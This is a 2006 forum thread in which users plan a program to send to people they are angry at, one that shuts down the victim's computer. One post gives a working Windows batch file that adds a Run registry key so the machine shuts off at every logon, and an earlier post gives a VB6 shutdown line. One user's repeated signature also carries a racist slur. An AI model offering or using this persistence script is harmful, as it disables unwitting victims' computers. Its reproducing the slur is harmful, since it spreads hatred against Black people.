ThyElite Forums  
Go Back   ThyElite Forums > General > General Talk
Reload this Page Pissed at someone? Send them this!
Reply
 
Thread Tools Display Modes
(#11)
Old
kevthedude is Offline
Veteran Member
kevthedude is on a distinguished road
 
Posts: 98
Join Date: Jun 2006
Default 08-19-2006, 09:58 PM

Quote:
Originally Posted by DefectiveProduct
Better yet, you could make a program that puts itself in the victims startup folder. And in the Form_Load event, you would make the program shut down their computer.

Wouldn't that be a bitch?
Didn't I give you that idea over at l0sers? If you can't move it to the startup folder then you could add the program to the registry. Even worse, 90% of people don't know the location to that registry file. Hell, most people don't even know how to access the registry.

Last edited by kevthedude : 08-19-2006 at 10:06 PM.
Reply With Quote
(#12)
Old
PlasmaShock is Offline
Elite Member
PlasmaShock is on a distinguished road
 
Posts: 154
Join Date: Jun 2006
Location: somewhere
Default 08-19-2006, 10:00 PM

Quote:
Originally Posted by DefectiveProduct
Better yet, you could make a program that puts itself in the victims startup folder. And in the Form_Load event, you would make the program shut down their computer.

Wouldn't that be a bitch?
the only hard part would be making the program and putting it in the person's startup folder.


Reply With Quote
(#13)
Old
DefectiveProduct is Offline
The Best
DefectiveProduct is on a distinguished road
 
Posts: 771
Join Date: Jul 2006
Location: O_o
Default 08-19-2006, 10:07 PM

Quote:
Originally Posted by kevthedude
Didn't I give you that idea over at l0sers? If you can't move it to the startup folder then you could add the program to the registry. Even worse, 90% of people don't know the location to that registry file. Hell, most people don't even know how to access the registry.
And I never figured out exactly how to do that. >_>

Quote:
Originally Posted by PlasmaShock
the only hard part would be making the program and putting it in the person's startup folder.
The only hard part would be to make the program copy itself in the registry/startup folder. Making it shut down the computer is easy. It just takes one line of coding.

Code:
Shell ("SHUTDOWN -S -t 1")






Reply With Quote
(#14)
Old
MYMOMMAGOTBEEF is Offline
Lots o' Posts
MYMOMMAGOTBEEF is on a distinguished road
 
Posts: 471
Join Date: Jul 2006
Location: MN
Send a message via AIM to MYMOMMAGOTBEEF
Default 08-19-2006, 10:58 PM

Can't you remotely add it to the registery?



[Made By Xplogen, Thanks ]
Reply With Quote
(#15)
Old
TAG is Offline
Master of the Post
TAG is on a distinguished road
 
Posts: 362
Join Date: Aug 2006
Location: Your Ass
Send a message via AIM to TAG
Default 08-19-2006, 11:04 PM

LOL, I'm doing to that and posting it on myspace! ROFL!

[EDIT]: I can't save it as a batch file. All I can save it as is a text file.




Put this exact line in your sig if you hate niggers

Last edited by TAG : 08-19-2006 at 11:07 PM.
Reply With Quote
(#16)
Old
DefectiveProduct is Offline
The Best
DefectiveProduct is on a distinguished road
 
Posts: 771
Join Date: Jul 2006
Location: O_o
Default 08-19-2006, 11:08 PM

Forgot to mention that it's in Visual Basic 6. :tard:






Reply With Quote
(#17)
Old
TAG is Offline
Master of the Post
TAG is on a distinguished road
 
Posts: 362
Join Date: Aug 2006
Location: Your Ass
Send a message via AIM to TAG
Default 08-19-2006, 11:11 PM

Wait, everyone, you have to add .bat AFTER the name you want. It's not a file you can save it as.

Example (just save it as this): thefilenameyouwant.bat.

Click save. Just save it as a text file, it will become a bat file.




Put this exact line in your sig if you hate niggers
Reply With Quote
(#18)
Old
TAG is Offline
Master of the Post
TAG is on a distinguished road
 
Posts: 362
Join Date: Aug 2006
Location: Your Ass
Send a message via AIM to TAG
Default 08-19-2006, 11:29 PM

WHAT THE FUCK. It keeps telling me that another program is using the file.




Put this exact line in your sig if you hate niggers
Reply With Quote
(#19)
Old
Sifter is Offline
Master of the Post
Sifter is on a distinguished road
 
Posts: 309
Join Date: Jul 2006
Location: Stockton, California
Send a message via AIM to Sifter Send a message via MSN to Sifter Send a message via Yahoo to Sifter
Default 08-20-2006, 12:22 AM

Make a Batch file with any name...
Code:
@ECHO off
CLS
ECHO REGEDIT4 >> temp.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> temp.reg
ECHO "ownage"="shutdown.exe -s -t 00" >> temp.reg
REGEDIT.EXE /s temp.reg
SHUTDOWN.EXE -s -t 00
If they are using Windows XP on an admins account, this will make their computer shut off every time they log on to their account.
Reply With Quote
(#20)
Old
MYMOMMAGOTBEEF is Offline
Lots o' Posts
MYMOMMAGOTBEEF is on a distinguished road
 
Posts: 471
Join Date: Jul 2006
Location: MN
Send a message via AIM to MYMOMMAGOTBEEF
Default 08-20-2006, 12:36 AM

OMFG! Thanks for providing us with that sifter . Well duh you have to save it with the extension .bat how else are you going to get a batch file.



[Made By Xplogen, Thanks ]
Reply With Quote
Reply



Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Im Fuckin Pissed! Money_C Raged 4 08-18-2006 06:32 PM
Fucking Pissed Of Bad At Fucking Proxy Users BigB0MB Raged 3 08-12-2006 12:04 PM



Powered by vBulletin® Version 3.6.8
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.